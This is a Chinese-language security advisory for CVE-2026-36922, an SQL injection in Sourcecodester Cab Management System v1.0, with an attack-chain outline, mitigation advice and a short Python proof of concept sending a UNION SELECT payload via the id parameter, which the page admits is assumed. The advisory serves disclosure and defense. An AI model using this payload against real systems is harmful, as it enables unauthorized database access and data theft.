IPBUF安全漏洞报告
English
CVE-2026-36922 CVSS 2.7 低危

CVE-2026-36922 Cab Management System SQL注入漏洞

披露日期: 2026-04-13

漏洞信息

漏洞编号
CVE-2026-36922
漏洞类型
SQL注入
CVSS评分
2.7 低危
攻击向量
网络 (AV:N)
认证要求
高权限 (PR:H)
用户交互
无需交互 (UI:N)
影响产品
Sourcecodester Cab Management System

相关标签

SQL注入CVE-2026-36922SourcecodesterCab Management SystemWeb安全

漏洞概述

Sourcecodester Cab Management System v1.0 版本存在SQL注入漏洞。该漏洞位于 /cms/admin/categories/view_category.php 文件中,由于应用程序未对用户输入的数据进行严格的过滤和验证,导致攻击者可以构造恶意的SQL语句。虽然利用此漏洞需要高权限,但攻击者仍可借此读取数据库中的敏感信息,对系统机密性造成威胁。

技术细节

该漏洞的成因在于应用程序在处理分类查看请求时,未对输入参数进行安全过滤,直接将其拼接到数据库查询语句中,导致产生了SQL注入漏洞。具体受影响文件为 /cms/admin/categories/view_category.php。攻击者通过构造特定的Payload,例如利用单引号闭合查询条件或使用UNION查询,可以欺骗后端数据库执行非预期的命令。根据CVSS评分,此漏洞利用需要高权限(PR:H),意味着攻击者通常需要拥有后台管理员账号。一旦利用成功,攻击者可绕过应用程序逻辑,从数据库中提取敏感信息(机密性影响低),尽管无法直接修改数据或导致拒绝服务,但仍存在信息泄露风险。

攻击链分析

STEP 1
1. 信息收集
攻击者确认目标系统为Sourcecodester Cab Management System v1.0,并定位到管理后台入口。
STEP 2
2. 获取权限
由于漏洞利用需要高权限(PR:H),攻击者需要通过钓鱼、暴力破解或其他方式获取管理员账号凭证并登录。
STEP 3
3. 漏洞利用
攻击者向 /cms/admin/categories/view_category.php 发送包含恶意SQL语句的请求,例如修改id参数进行注入。
STEP 4
4. 数据窃取
后端数据库执行恶意SQL查询,将敏感数据(如用户哈希、配置信息)包含在HTTP响应中返回给攻击者。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# PoC for CVE-2026-36922 # Target: /cms/admin/categories/view_category.php # Vulnerable parameter: id (assumed based on file context) import requests target_url = "http://target_ip/cms/admin/categories/view_category.php" cookies = { "PHPSESSID": "<admin_session_id>" # Requires High Privilege (Admin) } # Simple SQL Injection test payload payload = "1' UNION SELECT 1,2,3,4,5-- -" params = { "id": payload } response = requests.get(target_url, params=params, cookies=cookies) if response.status_code == 200: print("SQL Injection executed successfully.") print(response.text) else: print("Failed to execute request.")

影响范围

Sourcecodester Cab Management System 1.0

防御指南

临时缓解措施
建议立即检查系统日志,确认是否遭受过此类攻击。在官方补丁未发布前,应通过Web应用防火墙(WAF)部署规则,拦截针对 view_category.php 的异常SQL注入请求。同时,加强管理员账户的安全性,强制使用强密码并启用多因素认证(MFA),减少高权限账户被攻破的风险。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表